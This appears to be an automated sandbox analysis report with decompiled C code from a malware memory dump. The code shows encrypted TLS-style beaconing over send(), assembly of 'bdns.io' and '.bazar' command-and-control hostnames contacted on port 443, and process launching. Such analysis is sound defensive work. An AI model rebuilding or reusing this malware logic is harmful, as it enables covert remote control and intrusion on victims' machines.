    0x003cab55
    0x003cab5d
    0x003cab66
    0x003cab69
    0x003cab71
    0x003cab95
    0x003cabc2
    0x003cabe4
    0x00000000
    0x003cabf8
    0x003cabfe
    0x00000000
    0x003cabfe
    0x003cabc4
    0x003cabcb
    0x00000000
    0x003cabd4
    0x003cabda
    0x003cac03
    0x003cac05
    0x00000000
    0x00000000
    0x003cac05
    0x003cabcb
    0x003cab97
    0x003cab9e
    0x003caba0
    0x003caba5
    0x003caba8
    0x003cabad
    0x003cabad
    0x003cabb4
    0x003cabba
    0x003cabba
    0x00000000
    0x003cab9e
    0x003cab73
    0x003cab7a
    0x003cab84
    0x003cab8a
    0x003cab8d
    0x003cab8d
    0x003cac07
    0x003cac07
    0x003cac16
    0x003cac1a
    0x003cac1c
    0x003cac25
    0x003cac2a
    0x003cac2d
    0x003cac33
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003cac33
    0x003cac1a
    0x003cab71
    0x00000000
    0x003cab5d
    0x003cab10
    0x003cac40
    0x003cac40
    0x003caaff
    0x003caab8
    0x003cac41
    0x003cac46
    0x003cac49
    0x003cac49
    0x003cac4f
    0x003cac54
    0x003cac57
    0x003cac57
    0x003cac5d
    0x003cac62
    0x003cac6a
    0x003cac6a
    0x003cac6c
    0x003cac71
    0x003cac79
    0x003cac79
    0x003cac83
    0x003caa86
    0x003caa8c
    0x003caa8c

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003CAC57
      • Part of subcall function 003E10C0: tolower.MSVCRT ref: 003E10FB
    • SysFreeString.OLEAUT32(?), ref: 003CAB18
    • SysFreeString.OLEAUT32(?), ref: 003CAB29
    • SysAllocString.OLEAUT32(?), ref: 003CABB4
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • _wtoi.MSVCRT ref: 003CAB84
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDD78
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDD85
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDD92
      • Part of subcall function 003CDCD0: ??2@YAPAXI@Z.MSVCRT ref: 003CDE65
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDEB9
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDEC3
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDECD
      • Part of subcall function 003C3E30: SysFreeString.OLEAUT32(?), ref: 003C3F48
      • Part of subcall function 003C3E30: SysFreeString.OLEAUT32(?), ref: 003C3F5D
      • Part of subcall function 003C3E30: _wtoi.MSVCRT ref: 003C400E
      • Part of subcall function 003C3E30: rand.MSVCRT ref: 003C4080
      • Part of subcall function 003C3E30: SysFreeString.OLEAUT32(?), ref: 003C422F
      • Part of subcall function 003C3E30: SysFreeString.OLEAUT32(?), ref: 003C423D
    • SysFreeString.OLEAUT32(?), ref: 003CAC49
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DFD0B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184network
    C-Code - Quality: 18%
    			E003DFD0B(void* _a4, char _a8, signed int _a12) {
				char _v5;
				char _v6;
				char _v7;
				void* _v8;
				signed int _v9;
				char _v10;
				char _v11;
				void _v12;
				char* _v16;
				signed int _v20;
				void _v44;
				signed int _t83;
				signed int _t89;
				void* _t98;
				int _t99;
				short _t108;
				short _t109;
				signed int _t116;
				intOrPtr* _t120;
				signed int _t130;
				signed int _t132;
				void* _t146;
				int _t148;
				intOrPtr* _t153;
				void* _t155;
				void* _t156;
				signed int _t159;
				char* _t160;
				void* _t163;

				_t120 = _a4;
				_t148 = _a12;
				if(( *(_t120 + 0x10070) & 0x00000001) != 0 && _t148 != 0) {
					_t4 =  &_a8; // 0x3d407c
					E003DFD0B(_t120,  *_t4, 0);
					_t163 = _t163 + 0xc;
				}
				_t156 =  *0x3e8538(_t148 + 0x40);
				_a4 = _t156;
				_v16 =  *0x3e8538(_t148 + 0x40);
				_t83 =  *(_t120 + 0x10074);
				_v12 = _t83 >> 0x18;
				_v11 = _t83 >> 0x10;
				_v10 = _t83 >> 8;
				_v9 = _t83;
				_v8 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 0x18;
				_v20 = _t83;
				_v7 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 0x10;
				_v5 =  *(_t120 + 0x10070);
				 *_t156 = _v12;
				_v6 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 8;
				 *((intOrPtr*)(_t156 + 4)) = _v8;
				_t89 =  *(_t120 + 0x10070) |  *(_t120 + 0x10074);
				if(_t89 != 0) {
					 *((char*)(_t156 + 8)) = 0x17;
				} else {
					 *((char*)(_t156 + 8)) = 0x16;
				}
				 *((short*)(_t156 + 9)) = 0x103;
				__imp__#9(_t148);
				_t43 =  &_a8; // 0x3d407c
				 *(_t156 + 0xb) = _t89;
				_t45 = _t156 + 0xd; // 0xd
				memcpy(_t45,  *_t43, _t148);
				E003DEC77(_t120 + 4, 0x14, _t156, _t148 + 0xd,  &_v44);
				_t49 =  &_a8; // 0x3d407c
				memcpy(_t156,  *_t49, _t148);
				_t146 = _t156 + _t148;
				_t130 = 5;
				memcpy(_t146,  &_v44, _t130 << 2);
				_t132 = _a12;
				_t159 = _t132 + 0x00000014 & 0x8000000f;
				if(_t159 < 0) {
					_t159 = (_t159 - 0x00000001 | 0xfffffff0) + 1;
				}
				_t98 = 0x10;
				_t99 = _t98 - _t159;
				if(_t99 != 0) {
					if(_t99 == 1) {
						_push(0x11);
						goto L12;
					}
				} else {
					_push(0x10);
					L12:
					_pop(_t99);
				}
				_t56 = _t132 + 0x14; // 0x25
				_v8 = _t99 + _t56;
				memset(_t146 + 0x14, _t99 - 1, _t99);
				_t160 = _v16;
				if(E003DEF6B(_a4, _t99 + _t56, _t160 + 5, _t120 + 0x2c, _t120 + 0x4c, 1) != 0) {
					if(( *(_t120 + 0x10070) |  *(_t120 + 0x10074)) != 0) {
						 *_t160 = 0x17;
					} else {
						 *_t160 = 0x16;
					}
					_t153 = __imp__#9;
					_t108 =  *_t153(0x301);
					 *((short*)(_t160 + 1)) = _t108;
					_t109 =  *_t153(_v8);
					_t155 = _v8 + 5;
					 *((short*)(_t160 + 3)) = _t109;
					__imp__#19( *_t120, _t160, _t155, 0);
					_v16 = _t109;
					 *0x3e8540(_t160);
					 *0x3e8540(_a4);
					 *(_t120 + 0x10070) =  *(_t120 + 0x10070) + 1;
					asm("adc dword [ebx+0x10074], 0x0");
					asm("sbb eax, eax");
					_t116 =  !( ~(_v16 - _t155)) & _a12;
				} else {
					 *0x3e8540(_t160);
					 *0x3e8540(_a4);
					_t116 = 0;
				}
				return _t116;
			}
































    0x003dfd12
    0x003dfd24
    0x003dfd27
    0x003dfd2e
    0x003dfd32
    0x003dfd37
    0x003dfd37
    0x003dfd44
    0x003dfd4a
    0x003dfd53
    0x003dfd56
    0x003dfd61
    0x003dfd69
    0x003dfd71
    0x003dfd76
    0x003dfd87
    0x003dfd99
    0x003dfd9c
    0x003dfdb2
    0x003dfdb8
    0x003dfdba
    0x003dfdc0
    0x003dfdcc
    0x003dfdd2
    0x003dfdda
    0x003dfdd4
    0x003dfdd4
    0x003dfdd4
    0x003dfddf
    0x003dfde5
    0x003dfdec
    0x003dfdef
    0x003dfdf3
    0x003dfdf7
    0x003dfe0b
    0x003dfe11
    0x003dfe15
    0x003dfe1d
    0x003dfe22
    0x003dfe28
    0x003dfe2a
    0x003dfe30
    0x003dfe36
    0x003dfe3c
    0x003dfe3c
    0x003dfe3f
    0x003dfe40
    0x003dfe42
    0x003dfe4b
    0x003dfe4d
    0x00000000
    0x003dfe4d
    0x003dfe44
    0x003dfe44
    0x003dfe4f
    0x003dfe4f
    0x003dfe4f
    0x003dfe51
    0x003dfe5b
    0x003dfe5e
    0x003dfe63
    0x003dfe82
    0x003dfea4
    0x003dfeab
    0x003dfea6
    0x003dfea6
    0x003dfea6
    0x003dfeae
    0x003dfeb9
    0x003dfebe
    0x003dfec2
    0x003dfec9
    0x003dfece
    0x003dfed4
    0x003dfedb
    0x003dfede
    0x003dfee7
    0x003dfeed
    0x003dfef7
    0x003dff02
    0x003dff06
    0x003dfe84
    0x003dfe85
    0x003dfe8e
    0x003dfe94
    0x003dfe94
    0x003dff0f

    APIs
    • htons.WS2_32(?), ref: 003DFDE5
    • memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DEC77: memset.MSVCRT ref: 003DEC88
      • Part of subcall function 003DEC77: memset.MSVCRT ref: 003DEC98
      • Part of subcall function 003DEC77: memcpy.MSVCRT ref: 003DECA7
      • Part of subcall function 003DEC77: memcpy.MSVCRT ref: 003DECB9
    • memcpy.MSVCRT ref: 003DFE15
    • memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DEF6B: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003DEFA8
      • Part of subcall function 003DEF6B: CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003DEFF7
      • Part of subcall function 003DEF6B: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003DF00A
      • Part of subcall function 003DEF6B: memcpy.MSVCRT ref: 003DF01E
      • Part of subcall function 003DEF6B: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003DF040
      • Part of subcall function 003DEF6B: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003DF05D
      • Part of subcall function 003DEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003DF06A
      • Part of subcall function 003DEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF074
      • Part of subcall function 003DEF6B: memcpy.MSVCRT ref: 003DF0AA
      • Part of subcall function 003DEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003DF0B5
      • Part of subcall function 003DEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF0C0
    • htons.WS2_32(00000301), ref: 003DFEB9
    • htons.WS2_32(?), ref: 003DFEC2
    • send.WS2_32(?,?,?,00000000), ref: 003DFED4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E0DAA, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 99
    C-Code - Quality: 92%
    			E003E0DAA(void* __eax, void* __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t60;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t76;
				void* _t79;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t94;
				intOrPtr _t100;
				void* _t102;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t116;
				intOrPtr* _t117;
				void* _t118;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t125;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				void* _t145;
				intOrPtr _t146;
				intOrPtr* _t148;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				void* _t154;
				void* _t156;
				void* _t157;

				L0:
				while(1) {
					L0:
					_t146 = __esi;
					_t140 = __edi;
					_t102 = __ebx;
					L003CA47E();
					_t157 = _t156 + 4;
					if(__eax == 0) {
						goto L6;
					} else {
						 *((intOrPtr*)(_t154 - 0x1c)) = L003E1DC0(_t76);
						goto L7;
					}
					L8:
					_t12 = _t154 - 0x90; // 0x736e6462
					 *((intOrPtr*)(_t154 - 0x80)) = 0x7261;
					 *((intOrPtr*)(_t154 - 0x84)) = 0x7a61622e;
					 *((intOrPtr*)(_t154 - 0x88)) = 0x74737572;
					 *((intOrPtr*)(_t154 - 0x8c)) = 0x74656661;
					 *((intOrPtr*)(_t154 - 0x90)) = _t140;
					_t79 = E003C1170(_t12, 0xfde9, _t154 - 8, 0xffffffff);
					_t157 = _t157 + 0x10;
					if(_t79 == 0) {
						L51:
						_t61 =  *((intOrPtr*)(_t154 - 0x14));
						if( *((intOrPtr*)(_t154 - 0x14)) != 0) {
							E003CBB40(_t61);
							_t157 = _t157 + 4;
						}
						_t62 =  *((intOrPtr*)(_t154 - 0x10));
						if( *((intOrPtr*)(_t154 - 0x10)) != 0) {
							E003CBB40(_t62);
							_t157 = _t157 + 4;
						}
						_t63 =  *((intOrPtr*)(_t154 - 8));
						if( *((intOrPtr*)(_t154 - 8)) != 0) {
							E003CBB40(_t63);
							_t157 = _t157 + 4;
						}
						_t64 =  *((intOrPtr*)(_t154 - 0xc));
						if( *((intOrPtr*)(_t154 - 0xc)) != 0) {
							E003CBB40(_t64);
							_t157 = _t157 + 4;
						}
						_t65 =  *((intOrPtr*)(_t154 - 0x1c));
						if(_t65 != 0) {
							_push(_t65);
							L003C1CB0();
						}
						_t66 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0xac))))(0x3e8600);
						_t130 =  *0x3e8628; // 0x622508
						 *0x3e8618 =  *0x3e8618 - 1;
						 *((intOrPtr*)( *((intOrPtr*)(_t130 + 0xc4))))(0x3e8600);
						return  *((intOrPtr*)(_t154 - 0x18));
					}
					L9:
					_t148 =  *((intOrPtr*)(_t154 - 0x1c));
					_push(_t154 - 0x2c);
					_push( *((intOrPtr*)(_t154 - 8)));
					if( *((intOrPtr*)( *((intOrPtr*)( *_t148))))() != 0 &&  *((intOrPtr*)(_t154 - 0x2c)) == 0xc8) {
						L13:
						_t85 =  *((intOrPtr*)( *((intOrPtr*)( *_t148 + 0xc))))(_t154 - 0xc, _t154 - 0x28);
						__eflags = _t85;
						if(_t85 == 0) {
							goto L51;
						}
						L14:
						_t116 =  *((intOrPtr*)(_t154 - 0x28));
						__eflags = _t116 - 6;
						if(_t116 <= 6) {
							goto L51;
						}
						L15:
						_t86 =  *((intOrPtr*)(_t154 - 0xc));
						_t149 = _t116 + _t86;
						__eflags = _t86 - _t149;
						if(_t86 >= _t149) {
							L19:
							_t117 = _t86;
							__eflags = _t86 - _t149;
							if(_t86 >= _t149) {
								L25:
								_t118 = _t117 - _t86;
								__eflags = _t118 - 6;
								if(_t118 <= 6) {
									goto L51;
								}
								L26:
								__eflags = _t118 - 0x10;
								if(_t118 >= 0x10) {
									goto L51;
								}
								L27:
								_t87 = E003C1170(_t86, 0, _t154 - 0x14, _t118);
								_t157 = _t157 + 0x10;
								__eflags = _t87;
								if(_t87 == 0) {
									goto L51;
								}
								L28:
								_t104 =  *((intOrPtr*)(_t154 + 0xc));
								_t150 = 0;
								__eflags = 0;
								while(1) {
									L29:
									_t88 = L003C94D0(_t104,  *((intOrPtr*)(_t154 - 0x14)), 0x1bb);
									__eflags = _t88;
									if(_t88 != 0) {
										break;
									}
									L30:
									_t100 =  *0x3e8628; // 0x622508
									_t150 = _t150 + 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc8))))(0x7530);
									__eflags = _t150 - 0x14;
									if(_t150 < 0x14) {
										continue;
									}
									break;
								}
								L31:
								__eflags = _t150 - 0x14;
								if(_t150 == 0x14) {
									goto L51;
								}
								L32:
								_t151 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t154 - 4)) = 0;
								while(1) {
									L33:
									_t90 = E003CD890(_t151, __eflags,  *((intOrPtr*)(_t154 + 8)), _t104, _t154 - 4);
									_t157 = _t157 + 0xc;
									__eflags = _t90;
									if(_t90 == 0) {
										break;
									}
									L34:
									_t125 =  *0x3e8628; // 0x622508
									_t151 = _t151 + 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xc8))))(0x7530);
									__eflags = _t151 - 0x14;
									if(__eflags < 0) {
										continue;
									}
									L35:
									L38:
									__eflags = _t151 - 0x14;
									if(_t151 == 0x14) {
										goto L51;
									}
									L39:
									_t143 =  *((intOrPtr*)(_t154 + 8));
									_t152 = 0;
									__eflags = 0;
									 *((intOrPtr*)(_t154 - 4)) = 0;
									while(1) {
										L40:
										_t92 = E003D1B80(_t152, _t143, _t104, _t154 - 4);
										_t157 = _t157 + 0xc;
										__eflags = _t92;
										if(_t92 == 0) {
											break;
										}
										L41:
										_t123 =  *0x3e8628; // 0x622508
										_t152 = _t152 + 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0xc8))))(0x7530);
										__eflags = _t152 - 0x14;
										if(_t152 < 0x14) {
											continue;
										}
										L42:
										L45:
										__eflags = _t152 - 0x14;
										if(_t152 == 0x14) {
											goto L51;
										}
										L46:
										_t153 = 0;
										__eflags = 0;
										_t145 = _t104 + 8;
										while(1) {
											L47:
											_t94 = E003C1FE0(_t104, _t145, _t153,  *((intOrPtr*)(_t154 + 8)), _t104, _t145);
											_t157 = _t157 + 0xc;
											__eflags = _t94;
											if(_t94 != 0) {
												break;
											}
											L48:
											_t121 =  *0x3e8628; // 0x622508
											_t153 = _t153 + 1;
											 *((intOrPtr*)( *((intOrPtr*)(_t121 + 0xc8))))(0x7530);
											__eflags = _t153 - 0x64;
											if(_t153 < 0x64) {
												continue;
											}
											break;
										}
										L49:
										__eflags = _t153 - 0x64;
										if(_t153 != 0x64) {
											 *((intOrPtr*)(_t154 - 0x18)) = 1;
										}
										goto L51;
									}
									L43:
									_t144 =  *((intOrPtr*)(_t154 - 4));
									__eflags = _t144;
									if(_t144 != 0) {
										E003C1380(_t144);
										_push(_t144);
										L003C1CB0();
										_t157 = _t157 + 4;
									}
									goto L45;
								}
								L36:
								_t142 =  *((intOrPtr*)(_t154 - 4));
								__eflags = _t142;
								if(_t142 != 0) {
									E003C2DE0(_t142);
									_push(_t142);
									L003C1CB0();
									_t157 = _t157 + 4;
								}
								goto L38;
							}
							L20:
							do {
								L21:
								_t139 =  *_t117;
								__eflags = _t139 - 0x30;
								if(_t139 < 0x30) {
									L23:
									__eflags = _t139 - 0x2e;
									if(_t139 != 0x2e) {
										goto L25;
									}
									goto L24;
								}
								L22:
								__eflags = _t139 - 0x39;
								if(_t139 <= 0x39) {
									goto L24;
								}
								goto L23;
								L24:
								_t117 = _t117 + 1;
								__eflags = _t117 - _t149;
							} while (_t117 < _t149);
							goto L25;
						} else {
							goto L16;
						}
						do {
							L16:
							_t127 =  *_t86;
							__eflags = _t127 - 0x30;
							if(_t127 < 0x30) {
								goto L18;
							}
							L17:
							__eflags = _t127 - 0x39;
							if(_t127 <= 0x39) {
								goto L19;
							}
							L18:
							_t86 = _t86 + 1;
							__eflags = _t86 - _t149;
						} while (_t86 < _t149);
						goto L19;
					}
					L11:
					_t106 =  *0x3e8628; // 0x622508
					_t102 = _t102 + 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0xc8))))("h N");
					if(_t102 < 0x1e) {
						L1:
						 *((intOrPtr*)(_t154 - 0x8c)) = 0x6f692e;
						 *((intOrPtr*)(_t154 - 0x90)) = 0x736e6462;
						_t60 = E003C1170(_t154 - 0x90, 0xfde9, _t154 - 0x10, 0xffffffff);
						_t157 = _t157 + 0x10;
						_t161 = _t60;
						if(_t60 == 0) {
							goto L51;
						}
						L2:
						_t146 =  *((intOrPtr*)(_t154 - 0x10));
						_t76 = E003E1280(_t161,  *((intOrPtr*)(_t154 - 0x10)));
						_t157 = _t157 + 4;
						_push(0x1c);
						if(_t76 == 0) {
							L4:
							L003CA47E();
							_t157 = _t157 + 4;
							__eflags = _t76;
							if(_t76 == 0) {
								goto L6;
							} else {
								 *((intOrPtr*)(_t154 - 0x1c)) = E003E1D30(_t76);
								L7:
								_push(0x1bb);
								_push(_t146);
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 - 0x1c)))) + 8))))() == 0) {
									goto L11;
								}
								goto L8;
							}
						} else {
							continue;
						}
					}
					L12:
					goto L51;
					L6:
					 *((intOrPtr*)(_t154 - 0x1c)) = 0;
					goto L7;
				}
			}











































    0x003e0daa
    0x003e0daa
    0x003e0daa
    0x003e0daa
    0x003e0daa
    0x003e0daa
    0x003e0daa
    0x003e0daf
    0x003e0db4
    0x00000000
    0x003e0db6
    0x003e0dbd
    0x003e0dc0
    0x003e0dc0
    0x003e0df5
    0x003e0dfb
    0x003e0e07
    0x003e0e0e
    0x003e0e18
    0x003e0e22
    0x003e0e2c
    0x003e0e32
    0x003e0e37
    0x003e0e3c
    0x003e1037
    0x003e1037
    0x003e103f
    0x003e1042
    0x003e1047
    0x003e1047
    0x003e104a
    0x003e104f
    0x003e1052
    0x003e1057
    0x003e1057
    0x003e105a
    0x003e105f
    0x003e1062
    0x003e1067
    0x003e1067
    0x003e106a
    0x003e106f
    0x003e1072
    0x003e1077
    0x003e1077
    0x003e107a
    0x003e107f
    0x003e1081
    0x003e1082
    0x003e1087
    0x003e108a
    0x003e109a
    0x003e109c
    0x003e10a2
    0x003e10b3
    0x003e10bb
    0x003e10bb
    0x003e0e42
    0x003e0e42
    0x003e0e4f
    0x003e0e50
    0x003e0e57
    0x003e0e84
    0x003e0e93
    0x003e0e95
    0x003e0e97
    0x00000000
    0x00000000
    0x003e0e9d
    0x003e0e9d
    0x003e0ea0
    0x003e0ea3
    0x00000000
    0x00000000
    0x003e0ea9
    0x003e0ea9
    0x003e0eac
    0x003e0eaf
    0x003e0eb1
    0x003e0ec4
    0x003e0ec4
    0x003e0ec6
    0x003e0ec8
    0x003e0ee6
    0x003e0ee6
    0x003e0ee8
    0x003e0eeb
    0x00000000
    0x00000000
    0x003e0ef1
    0x003e0ef1
    0x003e0ef4
    0x00000000
    0x00000000
    0x003e0efa
    0x003e0f02
    0x003e0f07
    0x003e0f0a
    0x003e0f0c
    0x00000000
    0x00000000
    0x003e0f12
    0x003e0f12
    0x003e0f15
    0x003e0f15
    0x003e0f17
    0x003e0f17
    0x003e0f22
    0x003e0f27
    0x003e0f29
    0x00000000
    0x00000000
    0x003e0f2b
    0x003e0f2b
    0x003e0f3b
    0x003e0f3c
    0x003e0f3e
    0x003e0f41
    0x00000000
    0x00000000
    0x00000000
    0x003e0f41
    0x003e0f43
    0x003e0f43
    0x003e0f46
    0x00000000
    0x00000000
    0x003e0f4c
    0x003e0f4c
    0x003e0f4c
    0x003e0f4e
    0x003e0f51
    0x003e0f51
    0x003e0f5a
    0x003e0f5f
    0x003e0f62
    0x003e0f64
    0x00000000
    0x00000000
    0x003e0f66
    0x003e0f66
    0x003e0f77
    0x003e0f78
    0x003e0f7a
    0x003e0f7d
    0x00000000
    0x00000000
    0x003e0f7f
    0x003e0f98
    0x003e0f98
    0x003e0f9b
    0x00000000
    0x00000000
    0x003e0fa1
    0x003e0fa1
    0x003e0fa4
    0x003e0fa4
    0x003e0fa6
    0x003e0fb0
    0x003e0fb0
    0x003e0fb6
    0x003e0fbb
    0x003e0fbe
    0x003e0fc0
    0x00000000
    0x00000000
    0x003e0fc2
    0x003e0fc2
    0x003e0fd3
    0x003e0fd4
    0x003e0fd6
    0x003e0fd9
    0x00000000
    0x00000000
    0x003e0fdb
    0x003e0ff4
    0x003e0ff4
    0x003e0ff7
    0x00000000
    0x00000000
    0x003e0ff9
    0x003e0ff9
    0x003e0ff9
    0x003e0ffb
    0x003e1000
    0x003e1000
    0x003e1006
    0x003e100b
    0x003e100e
    0x003e1010
    0x00000000
    0x00000000
    0x003e1012
    0x003e1012
    0x003e1023
    0x003e1024
    0x003e1026
    0x003e1029
    0x00000000
    0x00000000
    0x00000000
    0x003e1029
    0x003e102b
    0x003e102b
    0x003e102e
    0x003e1030
    0x003e1030
    0x00000000
    0x003e102e
    0x003e0fdd
    0x003e0fdd
    0x003e0fe0
    0x003e0fe2
    0x003e0fe6
    0x003e0feb
    0x003e0fec
    0x003e0ff1
    0x003e0ff1
    0x00000000
    0x003e0fe2
    0x003e0f81
    0x003e0f81
    0x003e0f84
    0x003e0f86
    0x003e0f8a
    0x003e0f8f
    0x003e0f90
    0x003e0f95
    0x003e0f95
    0x00000000
    0x003e0f86
    0x00000000
    0x003e0ed0
    0x003e0ed0
    0x003e0ed0
    0x003e0ed2
    0x003e0ed5
    0x003e0edc
    0x003e0edc
    0x003e0edf
    0x00000000
    0x00000000
    0x00000000
    0x003e0edf
    0x003e0ed7
    0x003e0ed7
    0x003e0eda
    0x00000000
    0x00000000
    0x00000000
    0x003e0ee1
    0x003e0ee1
    0x003e0ee2
    0x003e0ee2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003e0eb3
    0x003e0eb3
    0x003e0eb3
    0x003e0eb5
    0x003e0eb8
    0x00000000
    0x00000000
    0x003e0eba
    0x003e0eba
    0x003e0ebd
    0x00000000
    0x00000000
    0x003e0ebf
    0x003e0ebf
    0x003e0ec0
    0x003e0ec0
    0x00000000
    0x003e0eb3
    0x003e0e62
    0x003e0e62
    0x003e0e73
    0x003e0e74
    0x003e0e79
    0x003e0d60
    0x003e0d72
    0x003e0d7c
    0x003e0d86
    0x003e0d8b
    0x003e0d8e
    0x003e0d90
    0x00000000
    0x00000000
    0x003e0d96
    0x003e0d9a
    0x003e0d9c
    0x003e0da1
    0x003e0da4
    0x003e0da8
    0x003e0dc2
    0x003e0dc2
    0x003e0dc7
    0x003e0dca
    0x003e0dcc
    0x00000000
    0x003e0dce
    0x003e0dd5
    0x003e0de1
    0x003e0de9
    0x003e0dee
    0x003e0df3
    0x00000000
    0x00000000
    0x00000000
    0x003e0df3
    0x00000000
    0x00000000
    0x00000000
    0x003e0da8
    0x003e0e7f
    0x00000000
    0x003e0dda
    0x003e0dda
    0x00000000
    0x003e0dda

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003E0DAA
    • ??3@YAXPAX@Z.MSVCRT ref: 003E1082
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E0420, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52process
    C-Code - Quality: 100%
    			E003E0420(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				int _t18;
				int _t31;

				memset( &_v88, 0, 0x44);
				_v20.hProcess = 0;
				_v20.hThread = 0;
				_v20.dwProcessId = 0;
				_v20.dwThreadId = 0;
				_v88.cb = 0x44;
				_v88.dwFlags = 1;
				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0x10, 0, 0,  &_v88,  &_v20);
				_t31 = _t18;
				if(_t31 != 0) {
					WaitForSingleObject(_v20.hProcess, 0x2710);
					CloseHandle(_v20);
					CloseHandle(_v20.hThread);
					return _t31;
				}
				return _t18;
			}







    0x003e042f
    0x003e0448
    0x003e044b
    0x003e044e
    0x003e0451
    0x003e045a
    0x003e0461
    0x003e0468
    0x003e046e
    0x003e0472
    0x003e047e
    0x003e048e
    0x003e0494
    0x00000000
    0x003e0498
    0x003e049d

    APIs
    • memset.MSVCRT ref: 003E042F
    • CreateProcessA.KERNEL32(00000000,003E0568,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 003E0468
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 003E047E
    • CloseHandle.KERNEL32(?), ref: 003E048E
    • CloseHandle.KERNEL32(?), ref: 003E0494
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D48F6, Relevance: 12.2, APIs: 8, Instructions: 247network
    C-Code - Quality: 16%
    			E003D48F6(intOrPtr* __ebx, intOrPtr _a4, void* _a8, int _a12) {
				void* _v8;
				void* _v12;
				signed int _v16;
				void* __esi;
				void* _t92;
				void* _t93;
				int _t94;
				void* _t98;
				signed int _t99;
				signed int _t100;
				void* _t108;
				void* _t110;
				void _t112;
				signed int _t113;
